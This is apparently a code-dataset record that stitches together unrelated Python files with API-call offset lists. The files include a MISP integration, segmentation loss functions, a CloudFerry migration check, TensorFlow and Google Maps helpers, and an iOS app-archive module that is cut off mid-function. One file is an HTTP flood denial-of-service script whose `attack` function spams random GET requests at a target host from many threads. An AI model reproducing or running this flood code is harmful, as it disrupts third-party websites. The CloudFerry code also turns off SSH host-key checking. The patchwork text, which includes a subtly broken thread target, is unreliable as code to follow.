return_results(add_events_from_feed(demisto_args=args, use_ssl=VERIFY, proxies=PROXIES))
elif command == 'file':
return_results(
generic_reputation_command(args, 'file', 'FILE', malicious_tag_ids, suspicious_tag_ids, reliability,
attributes_limit))
elif command == 'url':
return_results(
generic_reputation_command(args, 'url', 'URL', malicious_tag_ids, suspicious_tag_ids, reliability,
attributes_limit))
elif command == 'ip':
return_results(
generic_reputation_command(args, 'ip', 'IP', malicious_tag_ids, suspicious_tag_ids, reliability,
attributes_limit))
elif command == 'domain':
return_results(
generic_reputation_command(args, 'domain', 'DOMAIN', malicious_tag_ids, suspicious_tag_ids,
reliability, attributes_limit))
elif command == 'email':
return_results(generic_reputation_command(args, 'email', 'EMAIL', malicious_tag_ids, suspicious_tag_ids,
reliability, attributes_limit))
elif command == 'misp-add-file-object':
return_results(add_file_object(args))
elif command == 'misp-add-domain-object':
return_results(add_domain_object(args))
elif command == 'misp-add-url-object':
return_results(add_url_object(args))
elif command == 'misp-add-ip-object':
return_results(add_ip_object(args))
elif command == 'misp-add-object':
return_results(add_generic_object_command(args))
elif command == 'misp-update-attribute':
return_results(update_attribute_command(args))
except PyMISPError as e:
return_error(e.message)
except Exception as e:
return_error(str(e))
if __name__ in ['__main__', '__builtin__', 'builtins']:
main()
| [
"pymisp.tools.FileObject",
"pymisp.tools.GenericObjectGenerator",
"urllib.parse.urlparse",
"urllib3.disable_warnings",
"pymisp.MISPEvent",
"pymisp.ExpandedPyMISP",
"copy.deepcopy",
"pymisp.MISPObject",
"pymisp.MISPAttribute",
"pymisp.MISPSighting"
] | [((1129, 1155), 'urllib3.disable_warnings', 'urllib3.disable_warnings', ([], {}), '()\n', (1153, 1155), False, 'import urllib3\n'), ((1584, 1659), 'pymisp.ExpandedPyMISP', 'ExpandedPyMISP', ([], {'url': 'MISP_URL', 'key': 'MISP_API_KEY', 'ssl': 'VERIFY', 'proxies': 'PROXIES'}), '(url=MISP_URL, key=MISP_API_KEY, ssl=VERIFY, proxies=PROXIES)\n', (1598, 1659), False, 'from pymisp import ExpandedPyMISP, PyMISPError, MISPObject, MISPSighting, MISPEvent, MISPAttribute\n'), ((7707, 7744), 'pymisp.tools.GenericObjectGenerator', 'GenericObjectGenerator', (['template_name'], {}), '(template_name)\n', (7729, 7744), False, 'from pymisp.tools import GenericObjectGenerator\n'), ((12553, 12581), 'copy.deepcopy', 'copy.deepcopy', (['misp_response'], {}), '(misp_response)\n', (12566, 12581), False, 'import copy\n'), ((17464, 17475), 'pymisp.MISPEvent', 'MISPEvent', ([], {}), '()\n', (17473, 17475), False, 'from pymisp import ExpandedPyMISP, PyMISPError, MISPObject, MISPSighting, MISPEvent, MISPAttribute\n'), ((33799, 33822), 'copy.deepcopy', 'copy.deepcopy', (['response'], {}), '(response)\n', (33812, 33822), False, 'import copy\n'), ((40516, 40539), 'copy.deepcopy', 'copy.deepcopy', (['response'], {}), '(response)\n', (40529, 40539), False, 'import copy\n'), ((47985, 47999), 'pymisp.MISPSighting', 'MISPSighting', ([], {}), '()\n', (47997, 47999), False, 'from pymisp import ExpandedPyMISP, PyMISPError, MISPObject, MISPSighting, MISPEvent, MISPAttribute\n'), ((52082, 52103), 'pymisp.tools.FileObject', 'FileObject', (['file_path'], {}), '(file_path)\n', (52092, 52103), False, 'from pymisp.tools import FileObject\n'), ((52438, 52461), 'pymisp.MISPObject', 'MISPObject', (['"""domain-ip"""'], {}), "('domain-ip')\n", (52448, 52461), False, 'from pymisp import ExpandedPyMISP, PyMISPError, MISPObject, MISPSighting, MISPEvent, MISPAttribute\n'), ((53044, 53057), 'urllib.parse.urlparse', 'urlparse', (['url'], {}), '(url)\n', (53052, 53057), False, 'from urllib.parse import urlparse\n'), ((57209, 57224), 'pymisp.MISPAttribute', 'MISPAttribute', ([], {}), '()\n', (57222, 57224), False, 'from pymisp import ExpandedPyMISP, PyMISPError, MISPObject, MISPSighting, MISPEvent, MISPAttribute\n'), ((50039, 50050), 'pymisp.MISPEvent', 'MISPEvent', ([], {}), '()\n', (50048, 50050), False, 'from pymisp import ExpandedPyMISP, PyMISPError, MISPObject, MISPSighting, MISPEvent, MISPAttribute\n')] |
import torch
from torch.nn import functional as F
from torch import nn
from torch.autograd import Variable
from adet.utils.comm import compute_locations, aligned_bilinear
def dice_coefficient(x, target):
eps = 1e-5
n_inst = x.size(0)
x = x.reshape(n_inst, -1)
target = target.reshape(n_inst, -1)
intersection = (x * target).sum(dim=1)
union = (x ** 2.0).sum(dim=1) + (target ** 2.0).sum(dim=1) + eps
loss = 1. - (2 * intersection / union)
return loss
def lovasz_grad(gt_sorted):
"""
Computes gradient of the Lovasz extension w.r.t sorted errors
See Alg. 1 in paper
"""
p = len(gt_sorted)
gts = gt_sorted.sum()
intersection = gts - gt_sorted.float().cumsum(0)
union = gts + (1 - gt_sorted.float()).cumsum(0)
jaccard = 1. - intersection / union
if p > 1: # cover 1-pixel case
jaccard[1:p] = jaccard[1:p] - jaccard[0:-1]
return jaccard
def lovasz_hinge(logits, labels):
"""
Binary Lovasz hinge loss
logits: [P] Variable, logits at each prediction (between -\infty and +\infty)
labels: [P] Tensor, binary ground truth labels (0 or 1)
"""
if len(labels) == 0:
# only void pixels, the gradients should be 0
return logits.sum() * 0.
signs = 2. * labels.float() - 1.
errors = (1. - logits * Variable(signs))
errors_sorted, perm = torch.sort(errors, dim=0, descending=True)
perm = perm.data
gt_sorted = labels[perm]
grad = lovasz_grad(gt_sorted)
loss = torch.dot(F.relu(errors_sorted), Variable(grad))
return loss
def lovasz_loss(x, target):
eps = 1e-6
n_inst = x.size(0)
x = x.reshape(n_inst, -1)
target = target.reshape(n_inst, -1)
x = torch.clamp(x, min=eps, max=1-eps)
x = torch.log(x) - torch.log(1 - x)
losses = []
for i in range(n_inst):
losses.append(lovasz_hinge(x[i], target[i]))
loss = torch.stack(losses)
return loss
def build_mask_pred(cfg):
return MaskPred(cfg)
class MaskPred(nn.Module):
def __init__(self, cfg):
super(MaskPred, self).__init__()
self.in_channels = cfg.MODEL.EMBEDMASK.MASK_BRANCH.OUT_CHANNELS
self.mask_out_stride = cfg.MODEL.EMBEDMASK.MASK_OUT_STRIDE
soi = cfg.MODEL.FCOS.SIZES_OF_INTEREST
self.register_buffer("sizes_of_interest", torch.tensor(soi + [soi[-1] * 2]))
self.register_buffer("_iter", torch.zeros([1]))
self.mask_loss_type = cfg.MODEL.EMBEDMASK.MASK_LOSS_TYPE
self.mask_loss_alpha = cfg.MODEL.EMBEDMASK.MASK_LOSS_ALPHA
def __call__(self, pixel_embed, mask_feat_stride, pred_instances, gt_instances=None):
if self.training:
self._iter += 1
gt_inds = pred_instances.gt_inds
gt_bitmasks = torch.cat([per_im.gt_bitmasks for per_im in gt_instances])
gt_bitmasks = gt_bitmasks[gt_inds].unsqueeze(dim=1).to(dtype=pixel_embed.dtype)
losses = {}
if len(pred_instances) == 0:
dummy_loss = pixel_embed.sum() * 0 + pred_instances.proposal_embed.sum() * 0 + pred_instances.proposal_margin.sum() * 0
losses["loss_mask"] = dummy_loss
else:
mask_prob = self.compute_mask_prob(pred_instances, pixel_embed, mask_feat_stride)
if self.mask_loss_type == "Dice":
mask_losses = dice_coefficient(mask_prob, gt_bitmasks)
loss_mask = mask_losses.mean()
elif self.mask_loss_type == "Lovasz":
mask_losses = lovasz_loss(mask_prob, gt_bitmasks)
loss_mask = mask_losses.mean()
losses["loss_mask"] = loss_mask * self.mask_loss_alpha
return losses
else:
if len(pred_instances) > 0:
mask_prob = self.compute_mask_prob(pred_instances, pixel_embed, mask_feat_stride)
pred_instances.pred_global_masks = mask_prob
return pred_instances
def compute_mask_prob(self, instances, pixel_embed, mask_feat_stride):
proposal_embed = instances.proposal_embed
proposal_margin = instances.proposal_margin
im_inds = instances.im_inds
dim, m_h, m_w = pixel_embed.shape[-3:]
obj_num = proposal_embed.shape[0]
pixel_embed = pixel_embed.permute(0, 2, 3, 1)[im_inds]
proposal_embed = proposal_embed.view(obj_num, 1, 1, -1).expand(-1, m_h, m_w, -1)
proposal_margin = proposal_margin.view(obj_num, 1, 1, dim).expand(-1, m_h, m_w, -1)
mask_var = (pixel_embed - proposal_embed) ** 2
mask_prob = torch.exp(-torch.sum(mask_var * proposal_margin, dim=3))
assert mask_feat_stride >= self.mask_out_stride
assert mask_feat_stride % self.mask_out_stride == 0
mask_prob = aligned_bilinear(mask_prob.unsqueeze(1), int(mask_feat_stride / self.mask_out_stride))
return mask_prob
| [
"torch.sort",
"torch.log",
"torch.stack",
"torch.tensor",
"torch.cat",
"torch.sum",
"torch.nn.functional.relu",
"torch.autograd.Variable",
"torch.zeros",
"torch.clamp"
] | [((1370, 1412), 'torch.sort', 'torch.sort', (['errors'], {'dim': '(0)', 'descending': '(True)'}), '(errors, dim=0, descending=True)\n', (1380, 1412), False, 'import torch\n'), ((1719, 1755), 'torch.clamp', 'torch.clamp', (['x'], {'min': 'eps', 'max': '(1 - eps)'}), '(x, min=eps, max=1 - eps)\n', (1730, 1755), False, 'import torch\n'), ((1903, 1922), 'torch.stack', 'torch.stack', (['losses'], {}), '(losses)\n', (1914, 1922), False, 'import torch\n'), ((1518, 1539), 'torch.nn.functional.relu', 'F.relu', (['errors_sorted'], {}), '(errors_sorted)\n', (1524, 1539), True, 'from torch.nn import functional as F\n'), ((1541, 1555), 'torch.autograd.Variable', 'Variable', (['grad'], {}), '(grad)\n', (1549, 1555), False, 'from torch.autograd import Variable\n'), ((1762, 1774), 'torch.log', 'torch.log', (['x'], {}), '(x)\n', (1771, 1774), False, 'import torch\n'), ((1777, 1793), 'torch.log', 'torch.log', (['(1 - x)'], {}), '(1 - x)\n', (1786, 1793), False, 'import torch\n'), ((1327, 1342), 'torch.autograd.Variable', 'Variable', (['signs'], {}), '(signs)\n', (1335, 1342), False, 'from torch.autograd import Variable\n'), ((2328, 2361), 'torch.tensor', 'torch.tensor', (['(soi + [soi[-1] * 2])'], {}), '(soi + [soi[-1] * 2])\n', (2340, 2361), False, 'import torch\n'), ((2402, 2418), 'torch.zeros', 'torch.zeros', (['[1]'], {}), '([1])\n', (2413, 2418), False, 'import torch\n'), ((2770, 2828), 'torch.cat', 'torch.cat', (['[per_im.gt_bitmasks for per_im in gt_instances]'], {}), '([per_im.gt_bitmasks for per_im in gt_instances])\n', (2779, 2828), False, 'import torch\n'), ((4622, 4666), 'torch.sum', 'torch.sum', (['(mask_var * proposal_margin)'], {'dim': '(3)'}), '(mask_var * proposal_margin, dim=3)\n', (4631, 4666), False, 'import torch\n')] |
# Copyright 2016 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import getpass
import logging
from cloudferry.lib.base import exception
from cloudferry.lib.base.action import action
from cloudferry.lib.utils import local
from cloudferry.lib.utils import remote_runner
LOG = logging.getLogger(__name__)
class CheckVMAXPrerequisites(action.Action):
"""This verifies prerequisites required for NFS to VMAX iSCSI cinder
volume migration"""
def _iscsiadm_is_installed_locally(self):
LOG.info("Checking if iscsiadm tool is installed")
try:
local.run('iscsiadm --help &>/dev/null')
except local.LocalExecutionFailed:
msg = ("iscsiadm is not available on the local host. Please "
"install iscsiadm tool on the node you running on or "
"choose other cinder backend for migration. iscsiadm is "
"mandatory for migrations with EMC VMAX cinder backend")
LOG.error(msg)
raise exception.AbortMigrationError(msg)
def _check_local_sudo_password_set(self):
current_user = getpass.getuser()
if current_user != 'root' and \
self.cfg.migrate.local_sudo_password is None:
try:
local.sudo('ls')
except local.LocalExecutionFailed:
msg = ("CloudFerry is running as '{user}' user, but "
"passwordless sudo does not seem to be configured on "
"current host. Please either specify password in "
"`local_sudo_password` config option, or run "
"CloudFerry as root user.").format(user=current_user)
LOG.error(msg)
raise exception.AbortMigrationError(msg)
def _ssh_connectivity_between_controllers(self):
src_host = self.cfg.src.ssh_host
src_user = self.cfg.src.ssh_user
dst_host = self.cfg.dst.ssh_host
dst_user = self.cfg.dst.ssh_user
LOG.info("Checking ssh connectivity between '%s' and '%s'",
src_host, dst_host)
rr = remote_runner.RemoteRunner(src_host, src_user)
ssh_opts = ('-o UserKnownHostsFile=/dev/null '
'-o StrictHostKeyChecking=no')
cmd = "ssh {opts} {user}@{host} 'echo ok'".format(opts=ssh_opts,
user=dst_user,
host=dst_host)
try:
rr.run(cmd)
except remote_runner.RemoteExecutionError:
msg = ("No ssh connectivity between source host '{src_host}' and "
"destination host '{dst_host}'. Make sure you have keys "
"and correct configuration on these nodes. To verify run "
"'{ssh_cmd}' from '{src_host}' node")
msg = msg.format(src_host=src_host, dst_host=dst_host, ssh_cmd=cmd)
LOG.error(msg)
raise exception.AbortMigrationError(msg)
def run(self, **kwargs):
if self.cfg.dst_storage.backend != 'iscsi-vmax':
return
self._iscsiadm_is_installed_locally()
self._ssh_connectivity_between_controllers()
self._check_local_sudo_password_set()
| [
"logging.getLogger",
"cloudferry.lib.utils.remote_runner.RemoteRunner",
"cloudferry.lib.utils.local.sudo",
"cloudferry.lib.base.exception.AbortMigrationError",
"cloudferry.lib.utils.local.run",
"getpass.getuser"
] | [((789, 816), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (806, 816), False, 'import logging\n'), ((1627, 1644), 'getpass.getuser', 'getpass.getuser', ([], {}), '()\n', (1642, 1644), False, 'import getpass\n'), ((2639, 2685), 'cloudferry.lib.utils.remote_runner.RemoteRunner', 'remote_runner.RemoteRunner', (['src_host', 'src_user'], {}), '(src_host, src_user)\n', (2665, 2685), False, 'from cloudferry.lib.utils import remote_runner\n'), ((1092, 1132), 'cloudferry.lib.utils.local.run', 'local.run', (['"""iscsiadm --help &>/dev/null"""'], {}), "('iscsiadm --help &>/dev/null')\n", (1101, 1132), False, 'from cloudferry.lib.utils import local\n'), ((1522, 1556), 'cloudferry.lib.base.exception.AbortMigrationError', 'exception.AbortMigrationError', (['msg'], {}), '(msg)\n', (1551, 1556), False, 'from cloudferry.lib.base import exception\n'), ((1780, 1796), 'cloudferry.lib.utils.local.sudo', 'local.sudo', (['"""ls"""'], {}), "('ls')\n", (1790, 1796), False, 'from cloudferry.lib.utils import local\n'), ((3518, 3552), 'cloudferry.lib.base.exception.AbortMigrationError', 'exception.AbortMigrationError', (['msg'], {}), '(msg)\n', (3547, 3552), False, 'from cloudferry.lib.base import exception\n'), ((2266, 2300), 'cloudferry.lib.base.exception.AbortMigrationError', 'exception.AbortMigrationError', (['msg'], {}), '(msg)\n', (2295, 2300), False, 'from cloudferry.lib.base import exception\n')] |
import random
import socket
import string
import sys
import threading
import time
def attack(host: str, port: int = 80, request_count: int = 10 ** 10) -> None:
# Threading support
thread_num = 0
thread_num_mutex = threading.Lock()
# Utility function
def print_status() -> None:
global thread_num
thread_num_mutex.acquire(True)
thread_num += 1
print(f"\n[{time.ctime().split(' ')[3]}] [{str(thread_num)}] Under progress...")
thread_num_mutex.release()
def generate_url_path():
msg = str(string.ascii_letters + string.digits + string.punctuation)
data = "".join(random.sample(msg, 5))
return data
def attack_() -> None:
print_status()
url_path = generate_url_path()
dos = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
dos.connect((ip, port))
msg = f"GET /{url_path} HTTP/1.1\nHost: {host}\n\n"
dos.send(msg.encode())
except socket.error:
print(f"[ERROR] Site may be down | {socket.error}")
finally:
dos.shutdown(socket.SHUT_RDWR)
dos.close()
try:
host = host.replace("https://", "").replace("http://", "").replace("www.", "")
ip = socket.gethostbyname(host)
except socket.gaierror:
print("[ERROR] Make sure you entered a correct website!")
sys.exit(2)
all_threads = []
for i in range(request_count):
t1 = threading.Thread(target=attack)
t1.start()
all_threads.append(t1)
time.sleep(0.01)
for current_thread in all_threads:
current_thread.join()
| [
"socket.gethostbyname",
"random.sample",
"time.ctime",
"socket.socket",
"threading.Lock",
"time.sleep",
"sys.exit",
"threading.Thread"
] | [((228, 244), 'threading.Lock', 'threading.Lock', ([], {}), '()\n', (242, 244), False, 'import threading\n'), ((794, 843), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_STREAM'], {}), '(socket.AF_INET, socket.SOCK_STREAM)\n', (807, 843), False, 'import socket\n'), ((1281, 1307), 'socket.gethostbyname', 'socket.gethostbyname', (['host'], {}), '(host)\n', (1301, 1307), False, 'import socket\n'), ((1493, 1524), 'threading.Thread', 'threading.Thread', ([], {'target': 'attack'}), '(target=attack)\n', (1509, 1524), False, 'import threading\n'), ((1584, 1600), 'time.sleep', 'time.sleep', (['(0.01)'], {}), '(0.01)\n', (1594, 1600), False, 'import time\n'), ((646, 667), 'random.sample', 'random.sample', (['msg', '(5)'], {}), '(msg, 5)\n', (659, 667), False, 'import random\n'), ((1410, 1421), 'sys.exit', 'sys.exit', (['(2)'], {}), '(2)\n', (1418, 1421), False, 'import sys\n'), ((411, 423), 'time.ctime', 'time.ctime', ([], {}), '()\n', (421, 423), False, 'import time\n')] |
import random
class Yolov3(object):
def __init__(self):
self.num=0
self.input_size=[8,16,32]
def __iter__(self):
return self
def __next__(self):
a = random.choice(self.input_size)
self.num=self.num+1
if self.num<3:
return a
else:
raise StopIteration
yolo=Yolov3()
for data in yolo:
print(data)
| [
"random.choice"
] | [((161, 191), 'random.choice', 'random.choice', (['self.input_size'], {}), '(self.input_size)\n', (174, 191), False, 'import random\n')] |
import googlemaps
gmaps = googlemaps.Client(key='google_key')
def get_markers(address):
geocode_result = gmaps.geocode(address)
return geocode_result[0]['geometry']['location']
| [
"googlemaps.Client"
] | [((27, 62), 'googlemaps.Client', 'googlemaps.Client', ([], {'key': '"""google_key"""'}), "(key='google_key')\n", (44, 62), False, 'import googlemaps\n')] |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# Imports
import os
import numpy as np
import tensorflow as tf
def run(model, X, Y, optimizer=None, nb_epochs=30, nb_batches=128):
"""
Run the estimator
"""
if optimizer is None:
optimizer = tf.keras.estimators.SGD(
lr=0.0009, decay=1e-5, momentum=0.9, nesterov=True)
# 1. Compile the model
model.compile(
optimizer=optimizer, loss='categorical_crossentropy',
metrics=['accuracy'])
# 2. Create an estimator
model_est = tf.keras.estimator.model_to_estimator(
keras_model=model, model_dir='./lenet')
# Training
# 3a. Create the training function
train_input_fn = tf.estimator.inputs.numpy_input_fn(
x={model.input_names[0]: X['train'].astype(np.float32)},
y=Y['train'].astype(np.float32),
batch_size=nb_batches,
num_epochs=nb_epochs,
shuffle=True
)
# 3b. Train the model
model_est.train(input_fn=train_input_fn, steps=nb_epochs*nb_batches)
# Evaluate
# 4a. Evaluate the model
eval_input_fn = tf.estimator.inputs.numpy_input_fn(
x={model.input_names[0]: X['test'].astype(np.float32)},
y=Y['test'].astype(np.float32),
batch_size=nb_batches,
num_epochs=nb_epochs,
shuffle=True
)
# 4b. Evaluate the model
model_eval = model_est.evaluate(input_fn=eval_input_fn)
print(model_eval)
return model_est, model_eval
def run_from_generator(
model, input_func=None, input_func_dict=None,
eval_func_dict=None, nb_epochs=10, optimizer=None, model_dir=None):
"""
Overloaded function to create an estimator using tf.data.Dataset
:param model : uncompiled keras model
:param input_fn : input function providing tf.data.Dataset to the estimator
:param input_fn_dict : dictionary containing input params for input_fn
:param eval_fn_dict : dictionary containing params for eval input_fn
:param model_dir : directory to store the trained model
"""
# 1. Create optimizer and compile model if optimizer is None
if (optimizer is None):
optimizer = tf.keras.optimizers.SGD(
lr=1e-3, decay=1e-5, momentum=0.9, nesterov=True)
# 2. compile the model
model.compile(
optimizer=optimizer, loss='categorical_crossentropy',
metrics=['accuracy'])
# 3. create estimator
dir_path = os.path.join(os.getcwd(), model_dir)
print("Model path chosen : ", dir_path)
if (not os.path.exists(dir_path)):
os.mkdir(dir_path)
print("Creating estimator...")
est = tf.keras.estimator.model_to_estimator(
keras_model=model, model_dir=dir_path)
# 4. Train and Evaluate the model
print("Training...")
# training spec
train_spec = tf.estimator.TrainSpec(input_fn=lambda: input_func(input_func_dict),
max_steps=500)
# evaluation spec
eval_spec = tf.estimator.EvalSpec(input_fn=lambda: input_func(eval_func_dict))
# Run the training
model_est = tf.estimator.train_and_evaluate(est, train_spec, eval_spec)
#est.train(input_fn=lambda: input_func(input_func_dict),
# steps=None)
#
#est.evalute(input_fn=lambda: input_func(eval_func_dict))
return est
| [
"os.path.exists",
"tensorflow.keras.estimator.model_to_estimator",
"tensorflow.estimator.train_and_evaluate",
"tensorflow.keras.optimizers.SGD",
"os.getcwd",
"os.mkdir",
"tensorflow.keras.estimators.SGD"
] | [((613, 690), 'tensorflow.keras.estimator.model_to_estimator', 'tf.keras.estimator.model_to_estimator', ([], {'keras_model': 'model', 'model_dir': '"""./lenet"""'}), "(keras_model=model, model_dir='./lenet')\n", (650, 690), True, 'import tensorflow as tf\n'), ((2763, 2839), 'tensorflow.keras.estimator.model_to_estimator', 'tf.keras.estimator.model_to_estimator', ([], {'keras_model': 'model', 'model_dir': 'dir_path'}), '(keras_model=model, model_dir=dir_path)\n', (2800, 2839), True, 'import tensorflow as tf\n'), ((3197, 3256), 'tensorflow.estimator.train_and_evaluate', 'tf.estimator.train_and_evaluate', (['est', 'train_spec', 'eval_spec'], {}), '(est, train_spec, eval_spec)\n', (3228, 3256), True, 'import tensorflow as tf\n'), ((327, 403), 'tensorflow.keras.estimators.SGD', 'tf.keras.estimators.SGD', ([], {'lr': '(0.0009)', 'decay': '(1e-05)', 'momentum': '(0.9)', 'nesterov': '(True)'}), '(lr=0.0009, decay=1e-05, momentum=0.9, nesterov=True)\n', (350, 403), True, 'import tensorflow as tf\n'), ((2290, 2365), 'tensorflow.keras.optimizers.SGD', 'tf.keras.optimizers.SGD', ([], {'lr': '(0.001)', 'decay': '(1e-05)', 'momentum': '(0.9)', 'nesterov': '(True)'}), '(lr=0.001, decay=1e-05, momentum=0.9, nesterov=True)\n', (2313, 2365), True, 'import tensorflow as tf\n'), ((2583, 2594), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (2592, 2594), False, 'import os\n'), ((2663, 2687), 'os.path.exists', 'os.path.exists', (['dir_path'], {}), '(dir_path)\n', (2677, 2687), False, 'import os\n'), ((2698, 2716), 'os.mkdir', 'os.mkdir', (['dir_path'], {}), '(dir_path)\n', (2706, 2716), False, 'import os\n')] |
""" Represents an app archive. This is an app at rest, whether it's a naked
app bundle in a directory, or a zipped app bundle, or an IPA. We have a
common interface to extract these apps to a temp file, then resign them,
and create an archive of the same type """
import abc
import biplist
from bundle import App, Bundle, is_info_plist_native
from exceptions import MissingHelpers, NotSignable, NotMatched
from distutils import spawn
import logging
import os
from os.path import abspath, dirname, exists, isdir, isfile, join, normpath
import tempfile
import re
from subprocess import call
from signer import Signer
import shutil
import zipfile
REMOVE_WATCHKIT = True
helper_paths = {}
log = logging.getLogger(__name__)
def get_helper(helper_name):
""" find paths to executables. Cached in helper_paths """
if helper_name not in helper_paths or helper_paths[helper_name] is None:
# note, find_executable returns None is not found
# in other words, we keep retrying until found
helper_paths[helper_name] = spawn.find_executable(helper_name)
log.debug("got executable {} for {}".format(helper_paths[helper_name],
helper_name))
return helper_paths[helper_name]
def make_temp_dir():
return tempfile.mkdtemp(prefix="isign-")
def get_watchkit_paths(root_bundle_path):
""" collect sub-bundles of this bundle that have watchkit """
# typical structure:
#
# app_bundle
# ...
# some_directory
# watchkit_extension <-- this is the watchkit bundle
# Info.plist
# watchkit_bundle <-- this is the part that runs on the Watch
# Info.plist <-- WKWatchKitApp=True
#
watchkit_paths = []
for path, _, _ in os.walk(root_bundle_path):
if path == root_bundle_path:
continue
try:
bundle = Bundle(path)
except NotMatched:
# this directory is not a bundle
continue
if bundle.info.get('WKWatchKitApp') is True:
# get the *containing* bundle
watchkit_paths.append(dirname(path))
return watchkit_paths
def process_watchkit(root_bundle_path, should_remove=False):
""" Unfortunately, we currently can't sign WatchKit. If you don't
care about watchkit functionality, it is
generally harmless to remove it, so that's the default.
Remove when https://github.com/saucelabs/isign/issues/20 is fixed """
watchkit_paths = get_watchkit_paths(root_bundle_path)
if len(watchkit_paths) > 0:
if should_remove:
for path in watchkit_paths:
log.warning("Removing WatchKit bundle {}".format(path))
shutil.rmtree(path)
else:
raise NotSignable("Cannot yet sign WatchKit bundles")
class Archive(object):
__metaclass__ = abc.ABCMeta
# we use abc.abstractmethod throughout because there are certain class
# methods we want to ensure are implemented.
@abc.abstractmethod
def unarchive_to_temp(self):
""" Unarchive and copy to a temp directory """
pass
@abc.abstractmethod
def archive(cls, path, output_path):
""" Archive a directory to an output path """
pass
@abc.abstractmethod
def get_info(cls, path):
""" Obtain app metadata from Info.plist without unarchiving """
pass
@abc.abstractmethod
def precheck(cls, path):
""" Check if this is, in fact, an archive of this type """
pass
@abc.abstractmethod
def find_bundle_dir(cls, path):
""" Locate the directory of the main app (aka bundle) """
pass
class AppArchive(Archive):
""" The simplest form of archive -- a naked App Bundle, with no extra directory structure,
compression, etc """
@classmethod
def find_bundle_dir(cls, path):
""" Included for similarity with the zipped archive classes. In this case, the bundle dir
*is* the directory """
return path
@classmethod
def _get_plist_path(cls, path):
return join(cls.find_bundle_dir(path), "Info.plist")
@classmethod
def get_info(cls, path):
return biplist.readPlist(cls._get_plist_path(path))
@classmethod
def precheck(cls, path):
if not isdir(path):
return False
if not os.path.exists(cls._get_plist_path(path)):
return False
plist = cls.get_info(path)
is_native = is_info_plist_native(plist)
log.debug("is_native: {}".format(is_native))
return is_native
@classmethod
def archive(cls, path, output_path):
if exists(output_path):
shutil.rmtree(output_path)
shutil.move(path, output_path)
log.info("archived %s to %s" % (cls.__name__, output_path))
def __init__(self, path):
self.path = path
self.relative_bundle_dir = '.'
self.bundle_info = self.get_info(self.path)
def unarchive_to_temp(self):
containing_dir = make_temp_dir()
log.debug("unarchiving to temp... %s -> %s", self.path, containing_dir)
shutil.rmtree(containing_dir) # quirk of copytree, top dir can't exist already
shutil.copytree(self.path, containing_dir)
process_watchkit(containing_dir, REMOVE_WATCHKIT)
return UncompressedArchive(containing_dir, '.', self.__class__)
class AppZipArchive(Archive):
""" Just like an app, except it's zipped up, and when repackaged,
should be re-zipped. """
app_dir_pattern = r'^([^/]+\.app/).*$'
extensions = ['.zip']
helpers = ['zip', 'unzip']
@classmethod
def is_helpers_present(cls):
""" returns False if any of our helper apps wasn't found in class init """
is_present = True
for helper_name in cls.helpers:
if get_helper(helper_name) is None:
log.error("missing helper for class {}: {}".format(cls.__name__, helper_name))
is_present = False
break
return is_present
@classmethod
def is_archive_extension_match(cls, path):
""" does this path have the right extension """
log.debug('extension match')
for extension in cls.extensions:
log.debug('extension match: %s', extension)
if path.endswith(extension):
return True
return False
@classmethod
def find_bundle_dir(cls, zipfile_obj):
relative_bundle_dir = None
apps = set()
file_list = zipfile_obj.namelist()
for file_name in file_list:
matched = re.match(cls.app_dir_pattern, file_name)
if matched:
apps.add(matched.group(1))
if len(apps) == 1:
log.debug("found one app")
relative_bundle_dir = apps.pop()
elif len(apps) > 1:
log.warning('more than one app found in archive')
else:
log.warning('no apps found in archive')
return relative_bundle_dir
@classmethod
def _get_plist_path(cls, relative_bundle_dir):
return join(relative_bundle_dir, "Info.plist")
@classmethod
def precheck(cls, path):
""" Checks if an archive looks like this kind of app. Have to examine
within the zipfile, b/c we don't want to make temp dirs just yet. This
recapitulates a very similar precheck in the Bundle class """
if not isfile(path):
return False
if not cls.is_helpers_present():
raise MissingHelpers("helpers not present")
is_native = False
log.debug('precheck')
log.debug('path: %s', path)
if (cls.is_archive_extension_match(path) and
zipfile.is_zipfile(path)):
log.debug("this is an archive, and a zipfile")
zipfile_obj = zipfile.ZipFile(path)
relative_bundle_dir = cls.find_bundle_dir(zipfile_obj)
if relative_bundle_dir is not None:
plist_path = cls._get_plist_path(relative_bundle_dir)
if plist_path not in zipfile_obj.namelist():
return False
plist = cls.get_info(relative_bundle_dir, zipfile_obj)
is_native = is_info_plist_native(plist)
log.debug("is_native: {}".format(is_native))
return is_native
@classmethod
def get_info(cls, relative_bundle_dir, zipfile_obj):
plist_path = cls._get_plist_path(relative_bundle_dir)
plist_bytes = zipfile_obj.read(plist_path)
return biplist.readPlistFromString(plist_bytes)
def __init__(self, path):
self.path = path
zipfile_obj = zipfile.ZipFile(path)
self.relative_bundle_dir = self.find_bundle_dir(zipfile_obj)
self.bundle_info = self.get_info(self.relative_bundle_dir,
zipfile_obj)
def unarchive_to_temp(self):
containing_dir = make_temp_dir()
call([get_helper('unzip'), "-qu", self.path, "-d", containing_dir])
app_dir = abspath(join(containing_dir, self.relative_bundle_dir))
process_watchkit(app_dir, REMOVE_WATCHKIT)
return UncompressedArchive(containing_dir, self.relative_bundle_dir, self.__class__)
@classmethod
def archive(cls, containing_dir, output_path):
""" archive this up into a zipfile. Note this is a classmethod, because
the caller will use us on a temp directory somewhere """
# the temp file is necessary because zip always adds ".zip" if it
# does not have an extension. But we want to respect the desired
# output_path's extension, which could be ".ipa" or who knows.
# So we move it to the output_path later.
#
# We also do a little dance with making another temp directory just
# to construct the zip file. This is the best way to ensure the an unused
# filename. Also, `zip` won't overwrite existing files, so this is safer.
temp_zip_dir = None
try:
# need to chdir and use relative paths, because zip is stupid
temp_zip_dir = tempfile.mkdtemp(prefix="isign-zip-")
temp_zip_file = join(temp_zip_dir, 'temp.zip')
call([get_helper('zip'), "-qr", temp_zip_file, "."], cwd=containing_dir)
shutil.move(temp_zip_file, output_path)
log.info("archived %s to %s" % (cls.__name__, output_path))
finally:
if temp_zip_dir is not None and isdir(temp_zip_dir):
